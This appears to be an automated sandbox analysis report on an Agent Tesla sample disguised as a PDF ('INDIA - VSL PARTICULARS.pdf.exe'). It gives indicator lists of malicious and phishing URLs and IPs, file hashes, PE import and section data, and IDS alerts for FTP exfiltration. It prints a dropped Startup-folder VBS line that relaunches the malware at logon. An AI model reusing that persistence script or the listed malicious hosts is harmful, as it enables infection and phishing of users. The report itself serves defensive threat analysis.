                            https://check-smulti-993054.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                            • 172.67.74.152
                            file.exeGet hashmaliciousLummaC, VidarBrowse
                            • 104.26.12.205
                            SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                            • 104.26.13.205
                            SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            file.exeGet hashmaliciousLummaC, VidarBrowse
                            • 172.67.74.152
                            file.exeGet hashmaliciousLummaC, VidarBrowse
                            • 172.67.74.152
                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                            • 104.26.12.205
                            file.exeGet hashmaliciousLummaC, VidarBrowse
                            • 104.26.13.205

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUShttp://tes.lavender8639.workers.dev/Get hashmaliciousUnknownBrowse
                            • 172.67.155.11
                            https://gfdytre.pages.dev/Get hashmaliciousUnknownBrowse
                            • 172.66.44.67
                            https://pancakes.multiinx.com/Get hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            https://bzxr1tfchwjkqxjr8ftb.pages.dev/Get hashmaliciousUnknownBrowse
                            • 188.114.96.3
                            http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comGet hashmaliciousUnknownBrowse
                            • 104.16.167.228
                            https://consolbisezsproslogin.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                            • 104.16.117.116
                            https://dfgdhte22.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                            • 172.66.44.209
                            https://att-mail-109008.weeblysite.com/Get hashmaliciousUnknownBrowse
                            • 104.18.86.42
                            https://tiktokity.com/Get hashmaliciousUnknownBrowse
                            • 188.114.96.3
                            https://e95lq1vmgxojxrxkv7.pages.dev/Get hashmaliciousUnknownBrowse
                            • 172.66.47.149
                            UNIFIEDLAYER-AS-1UShttps://dwr.yoh.mybluehost.me/wp-content/plugins/A/sdh/TU17HLK/Get hashmaliciousUnknownBrowse
                            • 50.6.153.157
                            https://abre.ai/k8hXGet hashmaliciousUnknownBrowse
                            • 50.6.153.157
                            http://nky.beb.mybluehost.me/new/auth/entrar.phpGet hashmaliciousUnknownBrowse
                            • 50.6.153.4
                            https://turkiyecumhuriyetiziraatbankasi.com/Get hashmaliciousUnknownBrowse
                            • 162.240.37.219
                            https://c81df1b32e6c3c5e06e82397233e2695.crimachado.com.br/wehrgiwfbfeifef/djbfhokefbwuwrjow/djhfeokhrwihfekljd/cmVnaXN0cmF0b3JAc3Uuc2U=Get hashmaliciousHTMLPhisherBrowse
                            • 108.179.252.203
                            https://aac4b0887827b3598989c48a201d0420.crimachado.com.br/wehrgiwfbfeifef/djbfhokefbwuwrjow/djhfeokhrwihfekljd/bnpheWVkaUBzdGMuY29tLnNhGet hashmaliciousHTMLPhisherBrowse
                            • 108.179.252.203
                            https://miamibd.com/yahooGet hashmaliciousUnknownBrowse
                            • 192.185.182.82
                            https://www.alumni.upenn.edu/redirect.aspx?linkID=11371581&sendId=3557295&eid=208935&gid=2&tokenUrl=https://flow.page/gyphoninvestGet hashmaliciousHTMLPhisherBrowse
                            • 108.167.181.137
                            https://www.baidu.com/link?url=71TX_d4SSy_YcnMiSmK1k9U0hv2RvPANssrmsR9fCmhPc58TVaShxZVuVWaWCInt&wd=YWhvd2V8WlhWeWIzQmhhWFF1Ym1WMHxMalRQY2t0Uk90Get hashmaliciousUnknownBrowse
                            • 162.241.156.147
                            message.htmlGet hashmaliciousHTMLPhisherBrowse
                            • 69.49.245.172

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0ehttps://tk009.shop/Get hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            https://tk-shops.vip/Get hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            https://tiktokity.com/Get hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            https://e95lq1vmgxojxrxkv7.pages.dev/Get hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            https://www.tiktoksk.top/Get hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            https://tiktok3.top/Get hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            https://www.tiktokcp.com/Get hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            http://european-mall2.com/Get hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            https://tiktok526.shop/Get hashmaliciousUnknownBrowse
                            • 104.26.12.205
                            http://227819shop.com/Get hashmaliciousUnknownBrowse
                            • 104.26.12.205

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Temp\iodization

                            Download File
                            Process:C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):267264
                            Entropy (8bit):7.905293181648068
                            Encrypted:false
                            SSDEEP:6144:eX2vcKM6KjBK7Yj4zRwZSxHRL7KfWZbO1pEH:orfnVK7u4TPHKOVOY
                            MD5:6CE6F2F003596D30981969517B2F2AFB
                            SHA1:62EF5BFC194EC38907C3F440BFFA46478ABCC8EE
                            SHA-256:FAB3A9B09315324B6B1D477225FF0DC6A60431D70CF1440D28B1CFA279F14894
                            SHA-512:B3E3542360DCDC41424DCA92FF44FCB60C9BA37D5B6DDF12856C1433B7AA07664DD547B0934897C65A0A85DC4A579FAB85A97BE124905268ABBF66CE36BDD331
                            Malicious:false
                            Reputation:low
                            Preview:.b.J[RIC@5G6..5B.77QDWTM.7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXR.CD5I).W5.=...E..l._*!.?875;").$W-7Z6.URq6":m9Yc.w.j5=-&j8J<gY5B477Q,G.`|F.,.>.&~8.:.dI=fD.J<..:|%...2.F.;.,{`*K[G.'.a]I. .)fn+In#.1.11!o5.96CY5B477QDWTMP7C<../XRIC.pG6.X1B@.7.DWTMP7CR.OiYYHJD5.7CYM@477QDx.MP7SR8O.YRIC.5G&CY5@472QDWTMP7FR8OJXRIC$1G6GY5..57SDW.MP'CR(OJXRYCD%G6CY5B$77QDWTMP7CR.ZHX.ICD5'4C..C477QDWTMP7CR8OJXRICD5G6CY..57+QDWTMP7CR8OJXRICD5G6CY5B477.IUT.P7CR8OJXRICD.F6.X5B477QDWTMP7CR8OJXRICD5G6CwA'LC7QDO.LP7SR8O.YRIGD5G6CY5B477QDWtMPWm \.>9RI.)5G6.X5BZ77Q.VTMP7CR8OJXRIC.5Gvm=T6U77Q.gTMP.AR8YJXRCAD5G6CY5B477QD.TM..1!J,JXR..E5GVAY5.577qFWTMP7CR8OJXRI.D5.6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR8OJXRICD5G6CY5B477QDWTMP7CR

                            C:\Users\user\AppData\Local\directory\name.exe

                            Download File
                            Process:C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):1285979
                            Entropy (8bit):7.497913333541336
                            Encrypted:false
                            SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCVDIxOgo/lTHZQbJ0:7JZoQrbTFZY1iaCVq2Ce
                            MD5:6F780B2D3C14A3C9BB7C99C818421EA1
                            SHA1:A125C2A8CD2F4D4FBDA4429BDAE54E85EEC396A2
                            SHA-256:C7183B75AC8F638031ABBB6BB3EDD5223C626483D5CC82E6B30AE049DE038A00
                            SHA-512:73AE354DD618B311A413F23F759B6B56C1F256E631B998BCAD01E2C48621E50FB9900E3F9848D4351F77995B95B1A5A6B686741BAEA844D083C051082460A5A8
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 34%
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@..........................P................@.......@.........................T.......(............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc...(............T..............@..@........................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

                            Download File
                            Process:C:\Users\user\AppData\Local\directory\name.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):274
                            Entropy (8bit):3.408374803490271
                            Encrypted:false
                            SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlDQ1A1z4mA2n
                            MD5:86948B136B1F801E8D67F09107FE8579
                            SHA1:958A64F475E162FD6B7EE3A5CC11E1D49EF7CF99
                            SHA-256:AAE1242E1E0755FD14206D7FF8807311E68529F049AB1A47EA105E405C9494F7
                            SHA-512:9572FB2BCBB26BFF379A3ED930BEFECD6BC1A185A8FD5B47E60D7B09A50CD49C8B92569EB9667B0EFE71540232E46BC3D64B8BAB8A5996EAB9CE3625B5E08E4F
                            Malicious:true
                            Reputation:moderate, very likely benign file
                            Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.497913333541336
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:INDIA - VSL PARTICULARS.pdf.exe
                            File size:1'285'979 bytes
                            MD5:6f780b2d3c14a3c9bb7c99c818421ea1
                            SHA1:a125c2a8cd2f4d4fbda4429bdae54e85eec396a2
                            SHA256:c7183b75ac8f638031abbb6bb3edd5223c626483d5cc82e6b30ae049de038a00
                            SHA512:73ae354dd618b311a413f23f759b6b56c1f256e631b998bcad01e2c48621e50fb9900e3f9848d4351f77995b95b1a5a6b686741baea844d083c051082460a5a8
                            SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCVDIxOgo/lTHZQbJ0:7JZoQrbTFZY1iaCVq2Ce
                            TLSH:0255F121F5C69036C2B323B19E7EF766963D79360326D1AB37C82D215EA05816B39733
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                            File Icon

                            Icon Hash:1733312925935517

                            Static PE Info

                            General

                            Entrypoint:0x4165c1
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:0
                            File Version Major:5
                            File Version Minor:0
                            Subsystem Version Major:5
                            Subsystem Version Minor:0
                            Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                            Entrypoint Preview

                            Instruction
                            call 00007FBCB0C52FBBh
                            jmp 00007FBCB0C49E2Eh
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            mov ebp, esp
                            push edi
                            push esi
                            mov esi, dword ptr [ebp+0Ch]
                            mov ecx, dword ptr [ebp+10h]
                            mov edi, dword ptr [ebp+08h]
                            mov eax, ecx
                            mov edx, ecx
                            add eax, esi
                            cmp edi, esi
                            jbe 00007FBCB0C49FAAh
                            cmp edi, eax
                            jc 00007FBCB0C4A146h
                            cmp ecx, 00000080h
                            jc 00007FBCB0C49FBEh
                            cmp dword ptr [004A9724h], 00000000h
                            je 00007FBCB0C49FB5h
                            push edi
                            push esi
                            and edi, 0Fh
                            and esi, 0Fh
                            cmp edi, esi
                            pop esi
                            pop edi
                            jne 00007FBCB0C49FA7h
                            jmp 00007FBCB0C4A382h
                            test edi, 00000003h
                            jne 00007FBCB0C49FB6h
                            shr ecx, 02h
                            and edx, 03h
                            cmp ecx, 08h
                            jc 00007FBCB0C49FCBh
                            rep movsd
                            jmp dword ptr [00416740h+edx*4]
                            mov eax, edi
                            mov edx, 00000003h
                            sub ecx, 04h
                            jc 00007FBCB0C49FAEh
                            and eax, 03h
                            add ecx, eax
                            jmp dword ptr [00416654h+eax*4]
                            jmp dword ptr [00416750h+ecx*4]
                            nop
                            jmp dword ptr [004166D4h+ecx*4]
                            nop
                            inc cx
                            add byte ptr [eax-4BFFBE9Ah], dl
                            inc cx
                            add byte ptr [ebx], ah
                            ror dword ptr [edx-75F877FAh], 1
                            inc esi
                            add dword ptr [eax+468A0147h], ecx
                            add al, cl
                            jmp 00007FBCB30C27A7h
                            add esi, 03h
                            add edi, 03h
                            cmp ecx, 08h
                            jc 00007FBCB0C49F6Eh
                            rep movsd
                            jmp dword ptr [00000000h+edx*4]

                            Rich Headers

                            Programming Language:
                            • [ C ] VS2010 SP1 build 40219
                            • [C++] VS2010 SP1 build 40219
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [ASM] VS2010 SP1 build 40219
                            • [RES] VS2010 SP1 build 40219
                            • [LNK] VS2010 SP1 build 40219

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                            RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                            RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                            RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                            RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                            RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                            RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                            RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                            RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                            RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                            RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                            RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                            RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                            RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                            RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                            RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                            RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                            RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                            RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                            RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                            RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                            RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                            RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                            RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                            RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                            RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                            RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                            Imports

                            DLLImport
                            WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                            VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                            COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                            MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                            PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                            USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                            KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                            USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                            GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                            ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                            SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                            ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                            OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishGreat Britain
                            EnglishUnited States

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-09-26T05:34:32.803495+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.64971950.87.144.15721TCP
                            2024-09-26T05:34:33.314890+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.64972050.87.144.15735284TCP
                            2024-09-26T05:34:33.321440+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.64972050.87.144.15735284TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
